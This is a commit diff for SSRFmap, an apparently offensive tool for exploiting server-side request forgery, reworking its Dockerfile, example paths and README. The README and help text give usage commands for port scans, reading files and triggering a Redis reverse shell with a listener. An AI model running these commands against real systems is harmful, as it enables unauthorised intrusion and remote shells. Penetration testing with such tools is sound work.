Dockerfile reworked + examples

2024-06-08 20:48:06 +02:00 · 2024-06-08 20:48:06 +02:00 · 7a04c5bb60
parent 3eacb5d729
commit 7a04c5bb60
11 changed files with 72 additions and 48 deletions
--- a/.gitignore
+++ b/.gitignore
@ -104,3 +104,6 @@ venv.bak/

 # mypy
 .mypy_cache/
+
+# artifacts
+127.0.0.1_5000/
--- a/17
+++ b/17
@ -1,9 +1,14 @@
-FROM python:3-alpine3.10
+FROM python:3.12.4-alpine

-WORKDIR /opt
+WORKDIR /usr/src/app
+COPY . /usr/src/app

-RUN apk update && apk add git
-RUN git clone https://github.com/swisskyrepo/SSRFmap.git
-RUN cd /opt/SSRFmap && pip install -r requirements.txt
+RUN apk update && apk add curl

-ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
+# Install requirements
+RUN pip install -r requirements.txt
+
+# Downgrade privileges
+USER 1000
+
+ENTRYPOINT ["python3"]
--- a/README.md
+++ b/README.md
@ -45,37 +45,45 @@ The following modules are already implemented and can be used with the `-m` argu

 ## Install and Manual

-Basic install from the Github repository.
+* From the Github repository.
+  ```powershell
+  $ git clone https://github.com/swisskyrepo/SSRFmap
+  $ cd SSRFmap/
+  $ pip3 install -r requirements.txt
+  $ python3 ssrfmap.py

-```powershell
-$ git clone https://github.com/swisskyrepo/SSRFmap
-$ cd SSRFmap/
-$ pip3 install -r requirements.txt
-$ python3 ssrfmap.py
+    usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
+                      [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
+                      [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]

-  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
-                    [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
-                    [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
+    optional arguments:
+      -h, --help          show this help message and exit
+      -r REQFILE          SSRF Request file
+      -p PARAM            SSRF Parameter to target
+      -m MODULES          SSRF Modules to enable
+      -l HANDLER          Start an handler for a reverse shell
+      -v [VERBOSE]        Enable verbosity
+      --lhost LHOST       LHOST reverse shell
+      --lport LPORT       LPORT reverse shell
+      --uagent USERAGENT  User Agent to use
+      --ssl [SSL]         Use HTTPS without verification
+      --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
+      --level [LEVEL]     Level of test to perform (1-5, default: 1)
+  ```
+
+* Docker
+  ```powershell
+  $ git clone https://github.com/swisskyrepo/SSRFmap
+  $ docker build --no-cache -t ssrfmap .
+  $ docker run -it ssrfmap ssrfmap.py [OPTIONS] 
+  $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
+  ```

-  optional arguments:
-    -h, --help          show this help message and exit
-    -r REQFILE          SSRF Request file
-    -p PARAM            SSRF Parameter to target
-    -m MODULES          SSRF Modules to enable
-    -l HANDLER          Start an handler for a reverse shell
-    -v [VERBOSE]        Enable verbosity
-    --lhost LHOST       LHOST reverse shell
-    --lport LPORT       LPORT reverse shell
-    --uagent USERAGENT  User Agent to use
-    --ssl [SSL]         Use HTTPS without verification
-    --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
-    --level [LEVEL]     Level of test to perform (1-5, default: 1)
-```

 ## Examples

 First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. 
-They should look like the following. More examples are available in the **/data** folder.
+They should look like the following. More examples are available in the **./examples** folder.

 ```powershell
 POST /ssrf HTTP/1.1
@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s

 ```powershell
 # Launch a portscan on localhost and read default files
-python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
+python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
 ```

 If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.

 ```powershell
 # Launch a portscan against an HTTPS endpoint using a custom user-agent
-python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
 ```

 Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.

 ```powershell
 # Triggering a reverse shell on a Redis
-python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

 # -l create a listener for reverse shell on the specified port
 # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
@ -127,10 +135,19 @@ When the target is protected by a WAF or some filters you can try a wide range o

 A quick way to test the framework can be done with `data/example.py` SSRF service.

-```powershell
-FLASK_APP=data/example.py flask run &
-python ssrfmap.py -r data/request.txt -p url -m readfiles
-```
+* Local
+  ```powershell
+  FLASK_APP=examples/example.py flask run &
+  python ssrfmap.py -r examples/request.txt -p url -m readfiles
+  ```
+
+* Docker
+  ```ps1
+  docker build --no-cache -t ssrfmap .
+  docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
+  docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
+  ```
+

 ## Contribute

--- a/examples/example.py
+++ b/examples/example.py
@ -1,9 +1,8 @@
-# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
-# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: SSRF examples script
 # FLASK_APP=example.py flask run

-from flask import Flask, abort, request 
-import json
+from flask import Flask, request 
 import re
 import subprocess

--- a/examples/request.txt
+++ b/examples/request.txt
--- a/examples/request2.txt
+++ b/examples/request2.txt
--- a/examples/request3.txt
+++ b/examples/request3.txt
--- a/examples/request4.txt
+++ b/examples/request4.txt
--- a/examples/request5.txt
+++ b/examples/request5.txt
--- a/requirements.txt
+++ b/requirements.txt
@ -1,2 +1,2 @@
-Flask==2.3.2
-requests==2.21.0
+Flask==3.0.3
+requests==2.31.0
--- a/ssrfmap.py
+++ b/ssrfmap.py
@ -17,11 +17,11 @@ def display_banner():

 def parse_args():
    example_text = '''Examples:
-    python ssrfmap.py -r data/request2.txt -p url -m portscan
-    python ssrfmap.py -r data/request.txt -p url -m redis
-    python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
-    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
-    python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles 
+    python ssrfmap.py -r examples/request2.txt -p url -m portscan
+    python ssrfmap.py -r examples/request.txt -p url -m redis
+    python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+    python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+    python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles 
    '''
    parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")